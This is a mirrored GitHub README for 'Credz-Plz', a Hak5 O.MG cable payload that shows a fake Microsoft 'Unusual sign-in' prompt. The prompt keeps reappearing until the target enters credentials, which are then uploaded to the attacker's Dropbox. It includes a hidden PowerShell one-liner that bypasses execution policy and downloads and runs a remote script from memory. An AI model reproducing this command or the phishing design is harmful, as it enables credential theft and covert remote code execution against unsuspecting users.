mirror of https://github.com/hak5/omg-payloads.git
b299ecc2f1 | ||
---|---|---|
.. | ||
Credz-Plz-Execute.txt | ||
Credz-Plz.ps1 | ||
README.md | ||
sign-in.jpg | ||
unusual-sign-in.jpg |
README.md
Table of Contents
Credz-Plz
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
Description
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" This will be followed by a fake authentication ui prompt. If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up Once the target enters their credentials their information will be uploaded to your dropbox for collection
Getting Started
Dependencies
- DropBox or other file sharing service - Your Shared link for the intended file
- Windows 10,11
Executing program
- Plug in your device
- Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
Contributing
All contributors names will be listed here
I am Jakoby
Version History
- 0.1
- Initial Release
Contact
I am Jakoby
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)